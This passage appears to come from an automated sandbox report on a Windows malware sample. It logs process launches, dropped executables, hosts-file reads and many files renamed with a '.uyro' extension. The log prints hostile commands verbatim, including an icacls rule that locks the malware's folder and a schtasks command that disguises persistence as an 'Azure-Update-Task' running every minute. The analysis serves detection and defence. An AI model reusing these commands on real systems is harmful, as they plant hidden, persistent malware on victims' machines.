Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe" Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 1_2_0040D240
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218B7C6 CreateToolhelp32Snapshot,Module32First, 0_2_0218B7C6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: F5(O 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 9OE 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: #aN 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: #m2d 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: qQUQ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: "wcL 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 8d._ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: b.&F 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: I@KH 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: \@]K 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: >t9+ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: 3s 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: Tq. 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: G(p 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: B;S_ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: mr`7 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: R@ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: R@ 0_2_00403607
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Command line argument: lasisis 0_2_00403607
Source: U59WtZz2Sg.exe String found in binary or memory: set-addPolicy
Source: U59WtZz2Sg.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: U59WtZz2Sg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00406619 push ecx; ret 0_2_0040662C
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218E0AF push ecx; retf 0_2_0218E0B2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_0040322F
Drops PE files
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy) Jump to dropped file
